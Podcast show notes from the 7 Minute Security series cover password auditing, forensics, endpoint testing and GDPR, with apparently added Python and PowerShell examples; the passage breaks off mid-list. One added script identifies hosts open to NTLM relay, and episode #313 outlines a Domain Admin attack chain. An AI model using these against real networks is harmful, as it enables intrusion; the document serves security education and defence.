    • If you want to start your implementation with a small list - for example, just the top 100 entries off of Troy's list - you can trim it with:

    Get-Content ".\pwnedpasswords.txt" | select -First 100

    • As it relates to "hard coding" a machine to point to a specific domain controller, this site has the technique I used. Is there a better way?
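    As an added example, not the BPATTY instructions and not Troy Hunt's code: a small PowerShell check that loads only the first N entries of a Pwned Passwords download (the same trimming idea as the Get-Content line above) and tests a candidate password against them offline. It assumes the SHA-1 "ordered by prevalence" list format, one HASH:COUNT line per entry with the most common password first. The three sample lines are constructed for this example (real SHA-1 values of three well-known weak passwords, made-up counts), and the function names are this example's own.

```powershell
# Added example (not from the episode or BPATTY). Loads the top N entries of a
# Pwned Passwords list and checks a candidate password against them offline.
# Assumes the SHA-1 list format: one "HASH:COUNT" line per entry, most common first.

# Constructed sample in that format: real SHA-1 hashes of "123456", "qwerty" and
# "password", with made-up counts, already ordered most-to-least common.
$SampleList = @(
    '7C4A8D09CA3762AF61E59520943DC26494F8941B:23000000'
    'B1B3773A05C0ED0176787A4F1574FF0075F7521E:7700000'
    '5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8:3700000'
)

function Get-Sha1Hex {
    # Upper-case hex SHA-1 of the UTF-8 bytes of $Text, matching the list's encoding
    param([Parameter(Mandatory)][string]$Text)
    $sha1 = [System.Security.Cryptography.SHA1]::Create()
    try {
        $bytes = [System.Text.Encoding]::UTF8.GetBytes($Text)
        return (($sha1.ComputeHash($bytes) | ForEach-Object { $_.ToString('X2') }) -join '')
    } finally {
        $sha1.Dispose()
    }
}

function Import-PwnedHashSet {
    # Builds a lookup set from HASH:COUNT lines, keeping only the first $First entries
    # (0 = keep everything). Because the list is ordered by prevalence, "first 100"
    # means "the 100 most common passwords", which is the trimming trick from the episode.
    param(
        [Parameter(Mandatory)][string[]]$Lines,
        [int]$First = 0
    )
    $set = [System.Collections.Generic.HashSet[string]]::new([System.StringComparer]::OrdinalIgnoreCase)
    foreach ($line in $Lines) {
        if ($First -gt 0 -and $set.Count -ge $First) { break }
        $hash = ($line -split ':', 2)[0].Trim()
        if ($hash.Length -eq 40) { [void]$set.Add($hash) }   # skip blank or malformed lines
    }
    return ,$set   # leading comma stops PowerShell from unrolling the set into strings
}

function Test-PwnedPassword {
    # $true if the candidate's SHA-1 is in the loaded set, i.e. the password is on the list
    param(
        [Parameter(Mandatory)][string]$Password,
        [Parameter(Mandatory)]$HashSet
    )
    return $HashSet.Contains((Get-Sha1Hex -Text $Password))
}

# Trim the constructed sample to its top 2 entries, then test two candidates.
# For a real download, feed it the trimmed file instead:
#   Import-PwnedHashSet -Lines (Get-Content '.\pwnedpasswords.txt' | Select-Object -First 100)
$top2 = Import-PwnedHashSet -Lines $SampleList -First 2
Test-PwnedPassword -Password '123456'   -HashSet $top2
Test-PwnedPassword -Password 'password' -HashSet $top2
```

    With -First 2 only the two most common sample hashes are loaded, so "123456" is flagged and "password" (third in the sample) slips through; that is exactly the trade-off of starting with a short list, and it is why the candidate is hashed rather than compared as plaintext, so the check never needs the cleartext list. Slurping the full 500-million-line download into a HashSet like this is fine for testing a handful of candidates, not for a domain controller; the production filter is the tooling described on BPATTY.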

    7MS #324: How to Succeed in Business Without Really Crying - Part 4 Aug 23, 2018

    It's been a while so I thought I'd update you on how things are going on the business front. Here are the big updates I want to share with you in today's episode:

    • A new 7MS hire that's going to hunt sales opportunities!
    • My approach to finding podcast sponsors (it seems to be working)
    • Some kick-butt interviews that are on the horizon (including the one and only JOHN STRAND!)

    Lots of goodies to share today!


    7MS #323: 7 Ways to Not Get Hacked Aug 16, 2018

    I'm putting together a general security awareness session aimed at helping individuals and businesses not get hacked. To play off the lucky number 7, I'm trying to boil this list down to 7 key things to focus on. Here's my list thus far:

    1. Passwords
    2. 2FA/MFA
    3. Wifi (put a good password on it, don't use WEP, don't use WPS)
    4. Sign up for HaveIBeenPwned
    5. Update all the things
    6. Block malware/mining with browser plugins
    7. Security awareness training

    What do you think? Anything I missed or should consider swapping with another topic? Contact me!


    7MS #322: My First Live Radio Interview Aug 09, 2018

    I had an exhilarating and terrifying experience this week doing my first ever live radio interview!

    As a quick bit of background, this interview was part of the 7MS radio marketing campaign that I've talked about in my "How to Succeed in Business Without Really Crying" series (here's part 1, 2 and 3).

    The interview was conducted by Lee Michaels, and though my heart was pounding for the first few minutes, it quickly became fun as Lee and I talked about picking good passwords, securing wifi, talking to your kids about safe online behaviors, and more.


    7MS #321: Interview with Joe Klein - Part 2 Aug 01, 2018

    Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

    Today's episode is a follow-up interview with Joe Klein, who is my good pal, a former coworker, and a SOC analyst extraordinaire. You might remember Joe from things such as...this podcast - episode #290 to be exact.

    When we last left Joe, he had just started an exciting new journey as a SOC analyst, and also picked up a new sweet gig teaching college-level security courses. So Joe and I sat down last week in the 7 Minute Security studios to talk about:

    • How to be an absolute beast at networking
    • Seizing new opportunities (even if it seems scary)
    • Good certs for security newbs (and not-so-newbs) to pursue
    • Life as a SOC analyst
    • How to learn security by teaching it!

    This interview was an absolute blast to work on with Joe, and after it was over, neither of us could believe that the run time was nearly 2 hours! So in order to help you navigate the episode and have the best listening experience possible, we created the following "Choose Your Own Adventure" timeline with the high (and low?) discussion points of the interview. Enjoy!

    (Interview timeline available on 7MS under episode #321)


    7MS #320: Interview with Lane Roush of Arctic Wolf Jul 25, 2018

    Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

    This week I sat down with Lane Roush of Arctic Wolf to discuss the big hairy beast that is...(insert dramatic music here) logging and alerting! I work with a lot of clients (and you probably do too) who want answers to these questions:

    • What in the world is going on in my network?
    • How will I know if bad stuff is happening?
    • If I do identify the bad stuff and attempt to eradicate it, how will I know if I've exorcised all the demons?

    So Lane and I sat down to discuss this conundrum, and explore answers to other burning questions like:

    • Why is it so hard to separate the signal from noise when trying to figure out what's happening in the bowels of your network?
    • Should logging/alerting be a full-time job for one or more people?
    • When does it make sense to outsource these responsibilities?

    Check out today's interview to learn more, and also reach out to Arctic Wolf on their Twitter or LinkedIn for more information.


    7MS #319: Sniper and Firewalls Full of FUD Jul 20, 2018

    Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

    In today's episode, I talk about my fun experience using the Sn1per automated pentesting tool. It's really cool! It can scan your network, find vulnerabilities and exploit them - all in one swoop! It also does a nice one-two punch of OSINT+recon if you feed it a domain name.

    And, I tell a painful story about how a single checkbox setting in a firewall cost me a lot of hours and tears. You can LOL at me, learn from my pain, and we'll all be better for it.


    7MS #318: Interview with Bjorn Kimminich of OWASP Juice Shop Jul 11, 2018

    Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

    This week's show is another interview episode - this time with my pal Bjorn Kimminich of the OWASP Juice Shop.

    If you've never heard of the Juice Shop before, it's the world's most secure (and I mean that sarcastically) online shopping experience. Actually, it's chock full of security issues, which makes it a fantastic learning tool for Web app pentesters, be they seasoned or total newbs. Bjorn and I sat down (over Skype) to discuss:

    • How the Juice Shop came to be
    • The current status of application security (is it getting any better?!)
    • Common vulnerabilities still found in today's Web apps
    • Juice Shop being featured in Google's Summer of Code
    • How dev teams can better bake security into their products
    • What's next for the Juice Shop (hint: stay tuned after the episode is over for a hint on one new "feature")

    Bjorn has gone to great lengths to provide documentation about how to get up and running with a copy of the Juice Shop to begin your hacking. Personally I find it dead simple to follow Bjorn's instructions for spinning up a Docker container:

    docker pull bkimminich/juice-shop
    docker run --rm -p 3000:3000 bkimminich/juice-shop

    Should you find the Juice Shop to be a valuable tool, please be sure to ping Bjorn on Twitter to let him know.

    Be sure to follow the Juice Shop on Twitter as well. Psst...this account sometimes tweets coupon codes which can help you unlock certain challenges!


    7MS #317: Interview with Justin McCarthy of StrongDM Jul 05, 2018

    Today's interview features Justin McCarthy, CTO and cofounder of StrongDM, which offers both commercial and open source tools (like Comply) to help customers with SOC compliance.

    Justin schooled me (in a nice way) about a lot of things, including:

    • What SOC and the various SOC types are all about
    • What SOC compliance costs
    • What to look for in selecting a good auditor
    • Tools that can help companies make SOC compliance efforts go more smoothly

    7MS #316: How to Succeed in Business Without Really Crying - Part 3 Jun 28, 2018

    In this episode I wanted to give you some cool/fun updates as it relates to 7MS the business! Specifically:

    • A new member of the 7MS team (kinda!)
    • The weird and varied projects I'm working on
    • Upcoming podcast sponsors (probably in July)
    • 7MS has a "real" office coming soon to the southern metro of MN (hopefully!)

    7MS #315: Creating a Personal DR Plan - Part 2 Jun 21, 2018

    As a continuation of last week's episode I'm now making a bit of progress in finding a good backup solution that protects USB backups both at rest and when pumped up to the cloud.

    I mentioned I've been using BackBlaze for backups (not a sponsor), and they allow you to back up USB drives as long as they're connected at least once every 30 days. That's cool. However, many of my USB drives are not encrypted, and I want to protect myself in the off chance that someone breaks in and steals all my stuff while those unencrypted drives are connected.

    My BackBlaze backup PC is just a little dinky box running Windows 10 Home, so I don't have access to BitLocker. I was gonna drop the ~$100 for the Windows 10 Pro upgrade, but I coincidentally was doing an endpoint security product evaluation at the same time, and so I grabbed a copy of ESET's DESLock (also not a sponsor) because it was on sale. Where I'm stuck now is that the USB drives are unlocked, and yet for some reason BB can't properly back them up. I've got a ticket into their support folks, and will update you once we get to part 3 of this miniseries.


    7MS #314: Creating a Personal DR Plan Jun 13, 2018

    You probably create DR plans for your business (or help other companies build them), but have you thought about creating one for yourself? Yeah, I know it's grim to think about "What will my loved ones do to get into my accounts, backups, photos, social media accounts..." but it's probably not a bad idea to prepare for that (spoiler alert: we all die at some point).

    Today I talk about how I'm beginning to build such a plan so my wife can take over for my/our online accounts. This plan includes:

    • A "here's how I run all our technology" Google doc with domains I have registered, their expiration date, what their function is, etc.

    • A how-to guide on restoring data from our online backup solution

    • Implementation of a password manager


    7MS #313: Push-Button Domain Admin Access Jun 07, 2018

    As I was preparing for my Secure 360 talk a month or so ago, I stumbled upon this awesome article which details a method for getting Domain Admin access in just a few minutes - without cracking passwords or doing anything else "loud." The tools you'll need are:

    • PowerShell Empire
    • DeathStar
    • Responder
    • Ntlmrelayx

    I've written up all the steps in a gist that you can grab here. Enjoy!
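    One precondition the tool list above leaves unstated: Ntlmrelayx works by forwarding captured NTLM authentication to another host, and relaying to SMB only succeeds against targets that do not require SMB signing, because the relaying party never learns the session key needed to sign. The following is an added example (not the article, the gist, or any of the listed tools): a parser for the SecurityMode field of an SMB2 NEGOTIATE response, plus a builder that constructs such a response so the check runs offline. Field offsets follow the SMB2 header and NEGOTIATE response layouts; the dialect value and the buffer sizes in the constructed response are arbitrary.

```python
"""Check the precondition for relaying NTLM to SMB: does the target require signing?
Reads the SecurityMode field of an SMB2 NEGOTIATE response."""
import struct
from typing import NamedTuple

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED


class NegotiateInfo(NamedTuple):
    dialect: int
    signing_enabled: bool
    signing_required: bool


def parse_negotiate_response(packet: bytes) -> NegotiateInfo:
    """Read dialect and SecurityMode from a raw SMB2 NEGOTIATE response
    (SMB2 header onwards, without the 4-byte NetBIOS session length prefix)."""
    if len(packet) < 128 or packet[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    header_size, = struct.unpack_from("<H", packet, 4)
    command, = struct.unpack_from("<H", packet, 12)
    flags, = struct.unpack_from("<I", packet, 16)
    if header_size != 64 or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    # Body starts right after the 64-byte header:
    # StructureSize(2)=65, SecurityMode(2), DialectRevision(2), ...
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", packet, 64)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response structure size")
    return NegotiateInfo(
        dialect,
        bool(security_mode & SIGNING_ENABLED),
        bool(security_mode & SIGNING_REQUIRED),
    )


def relay_to_smb_possible(info: NegotiateInfo) -> bool:
    """A relayed NTLM exchange cannot produce a valid signing key, so a host that
    requires signing rejects the relayed session; 'enabled' alone does not protect it."""
    return not info.signing_required


def build_negotiate_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    """Constructed response for offline testing; only the fields the parser reads
    carry meaning, the GUID, sizes and times are filler."""
    header = struct.pack(
        "<4sHHIHHIIQIIQ16s",
        SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1, SMB2_FLAGS_SERVER_TO_REDIR,
        0, 0, 0, 0, 0, b"\x00" * 16,
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0, b"\x00" * 16,
        0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0,
    )
    return header + body


if __name__ == "__main__":
    for mode in (SIGNING_ENABLED, SIGNING_ENABLED | SIGNING_REQUIRED):
        info = parse_negotiate_response(build_negotiate_response(mode))
        print(f"dialect=0x{info.dialect:04x} required={info.signing_required} "
              f"relay_possible={relay_to_smb_possible(info)}")
```

    On a live network the same bytes come back from a NEGOTIATE request to TCP 445; nmap's smb2-security-mode script reports the same field, which is the quick way to build a target list of hosts where signing is not required. On the defending side, the fix is the "Microsoft network server: Digitally sign communications (always)" policy on every host, not only on domain controllers.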


    7MS #312: OFF-TOPIC - Boxing a Cat May 30, 2018

    It has been a heck of a week (in a good way), and I'm taking a break from security so you can help me untangle a mystery that's been wrapped around my brain for years. I need you to help me figure out what this dude meant when he said that something was as frustrating "as boxing a cat."

    P.S. if you hate off-topic episodes no worries! We'll be back to our regularly scheduled security program next week!


    7MS #311: How to Build a Cuckoo Sandbox May 24, 2018

    This week I dove into building a Cuckoo Sandbox for malware analysis. There are certainly a ton of posts and videos out there about it, but this entry called Painless Cuckoo Sandbox Installation caught my eye as a good starting point.

    This article got me about 80% of the way there, and the last 20% proved to be problematic. I got some additional answers from the Cuckoo documentation but still left some answers to be desired.

    Through a lot of Googling, banging my head against the wall and looking at the GitHub issues list, I finally got everything working.

    I've taken my entire build process and included it as a gist here. Enjoy!


    7MS #310: Secure the Radio Commercials May 18, 2018

    Last week I was in the recording studio to record three 7MS commercials aimed at churches. The goal was to educate them on some security topics and close with a "hook" to contact 7MS for help securing your church.

    The commercials themselves are embedded in this episode so please have a listen and let me know what you think! I'll also let you know (via the podcast) when these commercials hit the air. It's likely the station won't air in your area, but you can catch it on the interwebs if you so desire (thanks again for your support, mom).


    7MS #309: Password Cracking in the Cloud - Part 2 May 09, 2018

    Cracking passwords in the cloud is super fun (listen to last week's episode to learn how to build your own cracking box on the cheap at Paperspace)!

    In the last couple weeks, customers have asked me about doing a password strength assessment on their Active Directory environment. I asked around and read a bunch of blogs and found a method that I think:

    • Extracts the hashes safely
    • Parses down the dump to contain only the hashes (so that if somebody popped my Paperspace cloud-crackin' box, they'd have just a list of half-cracked hashes and that's it)
    • Does the work pretty automagically

    I talk about this in more detail in today's podcast, and here's the gist you can follow with all the necessary commands to get AD crackin'!


    7MS #308: Password Cracking in the Cloud May 02, 2018

    I had an absolute ball this week trying to figure out how to crack passwords effectively, and on the cheap, and in the cloud. Today's episode goes into much more detail, and embedded below is the Gist of my approach thus far. If you've got things to add/suggest to this document, let me know!

    P.S. if you don't see the gist because you're reading this in a podcast-catching app, head to https://7ms.us and look up today's episode and you'll see the gist in all its gisty glory!


    7MS #307: Writing Security-Focused Radio Commercials Apr 25, 2018

    Hey, so this week I am without my main machine - thus no jingle or "jungle boogie" intro music. Feels weird. Feels real weird.

    Anyway, ya know how I teased last week that 7MS could possibly be coming to a radio station near you? Well I think it's more of a probability than a possibility at this point!

    I met with a radio exec a few weeks ago and we talked about:

    • Lots of people still listen to the radio (who knew?)
    • Creating a "security minute" spot that would lead to a commercial about 7MS
    • How to write a good commercial "hook"
    • It's difficult to write a 60-second commercial!
    • Targeted advertising at churches, which is an under-served market when it comes to infosec
    • Writing a new (shortened) 7MS jingle

    More on this today on 7MS!


    7MS #306: A Peek into the 7MS Mail Bag - Part 2 Apr 19, 2018

    We've dug into some pretty technical topics the last few weeks so we're gonna take it easy today. Below are some FAQs and updates I'll cover on today's show:

    FAQs
    • What security certs should a sales person get?

    • What lav mic should I get for podcasting?

    • How do I know if I'm ready to take the OSCP?

    • When are you gonna do some more YouTube videos?

    • When will the PacktPub project be done?

    Updates

    Don't forget to check out these new and/or updated pages on BPATTY:

    • Caldera

    • LAPS

    • PwnedPasswords

    Speaking engagements
    • I learned that the Cryptolocker song was played as muzak for a security conference. That makes me LOL ;-)

    • Those of you in Minneapolis/St. Paul are invited to join me for Blue Team on a Budget lunch and learn at Manny's - it's on May 3 and hosted by OneIdentity.

    • I'll be at Secure360 on May 16 to give my Blue Team on a Budget talk at 9:30 a.m., and I'll also be hosting our pal Bjorn for his Twin Cities vs. OWASP Juice Shop workshop on May 17. Gonna be awesome - hope you can come to either event (or both!).


    7MS #305: Evaluating Endpoint Protection Solutions - Part 2 Apr 12, 2018

    Today is part two of evaluating endpoint solutions, where I primarily focus on Caldera which is an adversary simulation system that's really awesome! You can essentially set up a virtual attacker and cut it loose on some test machines, which is what I did as part of an endpoint protection evaluation project.

    The attacks simulated are from the Adversarial Tactics, Techniques & Common Knowledge (ATT&CK) project. So the big question is...did any of these endpoint solutions catch some of the simulated ATT&CKs? Check out today's podcast to find out!

    Oh, and I wrote up my quick install guide for Caldera here.


    7MS #304: Integrating Pwned Passwords with Active Directory Apr 05, 2018

    I've been super pumped about Troy Hunt's Pwned Passwords project ever since it came out - especially when I saw a tweet about using it in Active Directory so that enterprises could essentially stop people from picking previously pwned passwords! That led me to explore the following two solutions:

    Pwned Passwords DLL

    This blog entry has everything you need to get started with this GitHub project. If you've got some coding skillz you can probably give everything a quick read and have the DLL installed and running in no time. If you're like me and have little to zero Visual Studio experience, head to my BPATTY site page about Pwned Passwords where I've laid everything out step-by-step!

    Bottom line is this is a FREE way to check AD passwords against Troy's list of 500M+ previously pwned passwords. Awesome dude!

    SafePass.me

    I gave this commercial solution a demo and it worked fine as well. It's about $700 USD and comes packaged in an .MSI file that you simply double-click to install, then reboot the domain controller(s). It looks to do the exact same thing as Pwned Passwords DLL but without having to build a DLL or install it manually.


    7MS #303: Evaluating Endpoint Protection Solutions Mar 29, 2018

    I'm working on a fun project right now where I'm evaluating endpoint protection solutions for a client. They're faced with a choice of either refreshing endpoints to the latest gen of their current product, or doing a rip and replace with something else.

    I've spun up a standalone AD environment with ~5 Win 10 VMs and nothing on 'em except a current set of patches. The idea is I can assign each workstation VM an install of INSERT_NAME_OF_POPULAR_AV_VENDOR_HERE and have somewhat of a "bake off."

    Now what I'm finding is there are great sites like AV-Test and AV-Comparatives that do a nice job of breaking down what kind of performance, features, and management offerings a given vendor has. But what I haven't found is some structured testing for "act like a bad guy" actions. I'm thinking things like:

    • Mimikatz tomfoolery
    • Lateral attacks with Metasploit shells
    • Egress port scanning (to find an acceptable outbound port for C2 or data exfil)
    • Jacking around with various PowerShell scripts and commands

    However, thanks to some awesome friends on Slack they pointed me to what looks to be a nice set of scripts/tests - many of which could be used to see what kind of behaviors the endpoint protection will catch. So coming up in part #2 of this series, I'll do a deeper dive into:

    • RTA
    • Atomic Red Team

    7MS #302: Bunnies and Bloodhounds Mar 22, 2018

    I've had a fun week with a mixed bag of security related stuff happening, so I thought I'd throw it all in a big stew and cook it up for today's episode. Here are the highlights:

    Bash bunny preso

    I had a fun opportunity this week to speak to some property managers about the threats the Bash Bunny poses to an environment. Specifically I showed the one-two punch of:

    • How BB can steal your wireless network pre-shared keys that are saved to your PC

    • How BB can go into "Responder mode" to capture credentials

    • From the comfort of my mom's basement I can steal all this stuff, have it emailed to me, then drive up to your parking lot and join your wifi network with valid network creds! Sneaky bunnies FTW!

    Bloodhound

    I got to run this on a big AD environment this week and the results were super interesting. I'm working on a down and dirty Bloodhound quick start guide for BPATTY (coming soon).

    Brian's botched wireless

    Lesson learned this week: doing large Nessus scans from your home network can crush your ERX so scan with care (specifically, go into your Nessus policy and don't scan as many hosts simultaneously - I cranked mine down from like 100 hosts at a time to 5).


    7MS #301: CredDefense Mar 15, 2018

    Intro

    CredDefense is a freakin' sweet tool from the fine folks at Black Hills Information Security that does some really nifty things:

    Password filter

    Let's say you use the out-of-the-box password policy that comes with Active Directory, and you want to change your password to Winter2017! - AD is gonna say "Yeah dude/dudette, go for it...it fits the bill!" But from an attacker's perspective we know this is bad - people love to pick bad seasonal passwords like Winter2017, Summer2019, etc.

    With CredDefense's password filter in the mix, any new password gets checked against an additional word list, and if there's a match found within, BAM!! - password rejected.
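    The logic behind both the CredDefense password filter described here and the Pwned Passwords check from episode #304, as an added example (not CredDefense's code, not the Pwned Passwords DLL, and not anything from Troy Hunt's project): a new password is rejected if it matches a custom wordlist, if it fits a season-plus-year pattern, or if its SHA-1 turns up in Pwned Passwords. The breach lookup uses the k-anonymity range API, where only the first five characters of the hash are sent and the remaining 35 are compared locally. The wordlist, the range response and its counts are constructed so the example runs offline; the live lookup function is included but not called.

```python
"""Password filter logic: reject wordlist and seasonal passwords, then reject
anything already in Pwned Passwords via the k-anonymity range lookup."""
import hashlib
import re
from typing import Callable, Dict, Optional, Tuple

# Constructed custom wordlist (the CredDefense-style extra list), lower-cased.
BANNED_WORDS = {"winter2017", "summer2019", "welcome1", "companyname1"}

# Season + 2- or 4-digit year + optional trailing symbols, case-insensitive,
# so "wInTeR2017!" is caught even though it passes AD's complexity rules.
SEASONAL = re.compile(r"^(spring|summer|fall|autumn|winter)\d{2,4}[!@#$%^&*.]*$", re.I)

# Constructed stand-in for GET https://api.pwnedpasswords.com/range/<prefix>.
# A real response lists every SHA-1 suffix seen under that 5-character prefix
# as SUFFIX:COUNT. Counts here are made up; the last suffix is the tail of
# SHA-1("password") = 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8.
RANGE_RESPONSES: Dict[str, str] = {
    "5BAA6": (
        "003D68EB55068C33ACE09247EE4C639306B:3\r\n"
        "011053FD0102E94D6AE2F8B83D76FAF94F6:1\r\n"
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3730471\r\n"
    ),
}


def sha1_prefix_suffix(password: str) -> Tuple[str, str]:
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def pwned_count(password: str, fetch_range: Callable[[str], str]) -> int:
    """k-anonymity lookup: only the 5-character prefix leaves this host; the
    35-character suffix is matched locally, so the service never sees the full hash."""
    prefix, suffix = sha1_prefix_suffix(password)
    for line in fetch_range(prefix).splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate == suffix:
            return int(count)
    return 0


def offline_fetch_range(prefix: str) -> str:
    """Serves the constructed responses above so the example runs without network."""
    return RANGE_RESPONSES.get(prefix, "")


def live_fetch_range(prefix: str) -> str:
    """Real lookup against the Pwned Passwords range endpoint (not used by the offline demo)."""
    import urllib.request
    with urllib.request.urlopen(f"https://api.pwnedpasswords.com/range/{prefix}") as resp:
        return resp.read().decode("utf-8")


def check_password(password: str,
                   fetch_range: Callable[[str], str] = offline_fetch_range) -> Optional[str]:
    """Return the reason a password would be rejected, or None if it passes.
    The cheap local checks run first; the range lookup only runs if they pass."""
    if password.lower() in BANNED_WORDS:
        return "matches custom wordlist"
    if SEASONAL.match(password):
        return "seasonal pattern"
    count = pwned_count(password, fetch_range)
    if count:
        return f"seen {count} times in Pwned Passwords"
    return None


if __name__ == "__main__":
    for candidate in ("Winter2017!", "SUMMER2019", "password", "correct horse battery staple"):
        print(f"{candidate!r}: {check_password(candidate) or 'accepted'}")
```

    One design point worth weighing before wiring the live lookup into a real filter: a password filter runs inside LSASS on the domain controller, so the live variant means every password change triggers an outbound HTTPS request from a DC. Where that is not acceptable, the same suffix comparison works against the downloadable Pwned Passwords hash list held on disk.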

    Password audit

    Ok, so now are you curious who in your AD environment is already using crappy passwords like Winter2017? Load up the password audit feature, feed it a big wordlist like rockyou, and you'll be good to go in no time.

    ResponderGuard

    This is a nifty PowerShell tool that can jack with pentesters/attackers in your environment who are running the popular cred-stealing Responder tool. And what I especially appreciate from a blue team perspective is that if ResponderGuard catches Responder in use in the environment, it can stamp a log in the event log, which can then in turn generate an email if you're using something like WEFFLES (which we talked about recently) and the nifty WEFFLES email script my pal hackern0v1c3 put together here.


    7MS #300: Windows System Forensics 101 - Part 2 Mar 09, 2018

    In today's continuation of last week's episode I'm continuing a discussion on using free tools to triage Windows systems - be they infected or just acting suspicious. Specifically, those tools include:

    • FTK Imager - does a dandy job of creating memory dumps and/or full disk backups of a live system. You can also make a portable version by installing FTK Imager on a machine, then copying the C:\Program Files\wherever\FTK Imager\lives to a USB drive. FTK on the go!

    • Redline grabs a full forensics pack of data from a machine and helps you pick apart memory strings, network connections, event logs, URL history, etc. The tool helps you dig deep into the timeline of a machine and figure out "What the heck has this machine been doing from time X to Y?"

    • DumpIt does quick n' dirty memory dumps of machines.

    • Volatility allows you to, in a relatively low number of commands, determine if a machine has been up to no good. One of my favorite features is extracting malware right out of the memory image and analyzing it on a separate Linux VM with something like ClamAV.


    7MS #299: Windows System Forensics 101 Feb 28, 2018

    I had the privilege of creating a Windows System Forensics 101 course/presentation for a customer. The good/bad news is there is so much good information out there, it's hard to boil things down to just an hour.

    For the first part of the presentation, I focused on Mark Russinovich's technique of using Sysinternals as the primary surgical tool. This approach includes things like:

    1. Use Process Explorer to find processes with no signature and/or description.

    2. Put any suspicious processes to sleep before killing them (it's more humane! :-)

    3. Use autoruns to find registry entries, scheduled tasks, etc. that might be hooked to malicious executables that run on startup.

    4. Rinse and repeat.

    In part 2 (coming up soon!), I'll continue the forensics fight and talk about tools like Redline, Volatility and FTK Imager! Stay tuned.


    7MS #298: How to Succeed in Business Without Really Crying - Part 2 Feb 15, 2018

    Last week I talked about how business has been going with the LLC. Today I answer some additional questions that I didn't have time to address:

    • How I'm finding leads/projects to work on (TLDR: I'm NOT sending 1TB of PDFs to people, spamming them, calling them endlessly or LinkedIn'ing everybody and their mom)

    • The interesting conversations I'm having with customers who seem a little tired of the traditional pentest/assessment song and dance (spoiler alert: they're looking for people with solutions and who will actually help remediate the stuff in the report!)

    • The training services I'm offering are getting a lot more interest than I expected - and I think that's due to some of the sessions being more technical, yet not as intense as, say, a SANS course or the OSCP.

    More on today's show!


    7MS #297: How to Succeed in Business Without Really Crying Feb 08, 2018

    Intro

    Here's some of the "juice" that has helped 7MS have a successful start:

    Support system

    Ok so I think if you're going to have a successful business, you need an awesome support system. Mine consists of some of these things:

    • Faith - I'm a Christian and pray about this business constantly. In fact I learned really quickly how easy it is to brag about your rock-solid faith when everything is going fine. And then when suddenly the rug is pulled out from under you, you find what your faith is really made of!

    • My wife - she's my biggest supporter and cheerleader.

    • Financial advisor - we have a great "money guy" who helped us plan for moments like these, where income might be slower as I drum up business.

    • Trusted advisors - I'm blessed to have a partner called InteProIQ that has been a sounding board for a zillion and one questions. Everything from helping me quote projects and set hourly rates to marketing plans and connecting me with other business owners and contacts.

    General "get your business started" stuff
    • Form your LLC - I just Googled how to do it, and found a bunch of articles with good info. Basically I found my state's Web site hierarchy and within that was a place to register the LLC and grab an EIN for tax purposes.

    • Bank accounts - I visited my local banker and setup work checking/savings/etc.

    Tech tools to help you get the job done
    • Quickbooks - I use this to keep track of expenses, send out quotes, reconcile invoices, etc.

    • Expensify - I use it to track receipts and mileage. They even give you an email address where you can forward receipts to and it'll work its awesome OCR magic to automatically extract the vendor, charge and date. Awesome!

    • Toggl - a free Web interface (and app) to track time for projects (if the client doesn't already have something they want me to use)

    ....more on 7MS.us!


    7MS #296: WEFFLES - Windows Event Logging Forensic Logging Enhancement Services Feb 01, 2018

    WEFFLES are delicious!

    WEFFLES stands for Windows Event Logging Forensic Logging Enhancement Services and is Microsoft's cool (and free!) console for responding to incidents and hunting threats. I had a chance to play with it in the lab this week and for the most part, the install of WEFFLES went well, but I had one minor issue that was cleared up easily.

    As I went through the MS TechNet article, I wrote a full install write-up on my BPATTY site.

    So go gobble up some WEFFLES and let me know how it goes!


    7MS #295: Interview with Kevin Keane Jan 25, 2018

    Today I'm excited to be joined by my friend and advisor Kevin Keane (Twitter / LinkedIn) who is a lawyer, blogger, keynote speaker, business advisor, and just all around great guy. Kevin and I sit down to talk about:

    • How SMBs can take some productive security baby steps
    • How to get the most value out of your next security consultant engagement
    • Can breaches ever be funny?
    • What is the Trust Calculus?
    • Do I need to care about GDPR?

    That and much more is coming up today on this special interview edition of the 7 Minute Security podcast!


    7MS #294: GDPR Me ASAP Jan 18, 2018

    GDPR in a nutshell

    GDPR, in a nutshell, is a set of legal regulations focused on the privacy of personal data belonging to people in the EU (the regulation talks about "data subjects" rather than citizens, and it applies to organizations outside the EU that handle that data). Entities that store and/or process this personal data must clearly explain to the data subjects what data is being stored and processed, and which parties the data is being shared with. Where consent is the lawful basis for processing (the other lawful bases are listed below), the data subject must opt in to each purpose for which their data is stored and processed. Data subjects also must be able to, at any time, request a copy of the data or request that it be deleted.

    How does GDPR define "personal data"

    As “any information relating to an identified or identifiable natural person."

    When do GDPR regulations start being enforced?

    May 25, 2018.

    What are the key roles organizations need to be aware of as it relates to handling data under GDPR regulations?

    Two primary roles:

    Controller

    An entity that determines the purposes, conditions and means of the processing of personal data

    Processor

    An entity which processes personal data on behalf of the controller

    What are the GDPR lawful bases for processing data?
